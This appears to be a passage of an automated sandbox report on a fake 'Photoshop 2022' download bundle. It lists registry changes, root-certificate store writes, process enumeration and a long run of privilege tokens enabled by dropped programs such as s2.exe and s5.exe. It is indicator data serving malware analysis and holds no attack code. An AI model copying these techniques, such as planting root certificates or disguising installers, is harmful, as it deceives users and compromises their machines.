Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Johan.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2976	reg.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	setup.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	setup.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	setup.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	s5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	setup.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	setup.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	setup.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	s5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	s5.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	s5.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2284	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1456	Download Photoshop 2022 3 rar.tmp
1456	Download Photoshop 2022 3 rar.tmp
1216	s0.tmp
1216	s0.tmp
2220	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2116	msiexec.exe
2116	msiexec.exe
2536	zazam.exe
2536	zazam.exe
3044	Silverlight.Configuration.exe
3044	Silverlight.Configuration.exe
3044	Silverlight.Configuration.exe
3044	Silverlight.Configuration.exe
3044	Silverlight.Configuration.exe
3044	Silverlight.Configuration.exe
3044	Silverlight.Configuration.exe
3044	Silverlight.Configuration.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1960	svchost.exe
1960	svchost.exe
2848	powershell.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1628	Adblock.exe
2072	s5.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	572	wmiprvse.exe
Token: SeDebugPrivilege	1760	taskkill.exe
Token: SeRestorePrivilege	2116	msiexec.exe
Token: SeTakeOwnershipPrivilege	2116	msiexec.exe
Token: SeSecurityPrivilege	2116	msiexec.exe
Token: SeCreateTokenPrivilege	1152	s2.exe
Token: SeAssignPrimaryTokenPrivilege	1152	s2.exe
Token: SeLockMemoryPrivilege	1152	s2.exe
Token: SeIncreaseQuotaPrivilege	1152	s2.exe
Token: SeMachineAccountPrivilege	1152	s2.exe
Token: SeTcbPrivilege	1152	s2.exe
Token: SeSecurityPrivilege	1152	s2.exe
Token: SeTakeOwnershipPrivilege	1152	s2.exe
Token: SeLoadDriverPrivilege	1152	s2.exe
Token: SeSystemProfilePrivilege	1152	s2.exe
Token: SeSystemtimePrivilege	1152	s2.exe
Token: SeProfSingleProcessPrivilege	1152	s2.exe
Token: SeIncBasePriorityPrivilege	1152	s2.exe
Token: SeCreatePagefilePrivilege	1152	s2.exe
Token: SeCreatePermanentPrivilege	1152	s2.exe
Token: SeBackupPrivilege	1152	s2.exe
Token: SeRestorePrivilege	1152	s2.exe
Token: SeShutdownPrivilege	1152	s2.exe
Token: SeDebugPrivilege	1152	s2.exe
Token: SeAuditPrivilege	1152	s2.exe
Token: SeSystemEnvironmentPrivilege	1152	s2.exe
Token: SeChangeNotifyPrivilege	1152	s2.exe
Token: SeRemoteShutdownPrivilege	1152	s2.exe
Token: SeUndockPrivilege	1152	s2.exe
Token: SeSyncAgentPrivilege	1152	s2.exe
Token: SeEnableDelegationPrivilege	1152	s2.exe
Token: SeManageVolumePrivilege	1152	s2.exe
Token: SeImpersonatePrivilege	1152	s2.exe
Token: SeCreateGlobalPrivilege	1152	s2.exe
Token: SeCreateTokenPrivilege	1152	s2.exe
Token: SeAssignPrimaryTokenPrivilege	1152	s2.exe
Token: SeLockMemoryPrivilege	1152	s2.exe
Token: SeIncreaseQuotaPrivilege	1152	s2.exe
Token: SeMachineAccountPrivilege	1152	s2.exe
Token: SeTcbPrivilege	1152	s2.exe
Token: SeSecurityPrivilege	1152	s2.exe
Token: SeTakeOwnershipPrivilege	1152	s2.exe
Token: SeLoadDriverPrivilege	1152	s2.exe
Token: SeSystemProfilePrivilege	1152	s2.exe
Token: SeSystemtimePrivilege	1152	s2.exe
Token: SeProfSingleProcessPrivilege	1152	s2.exe
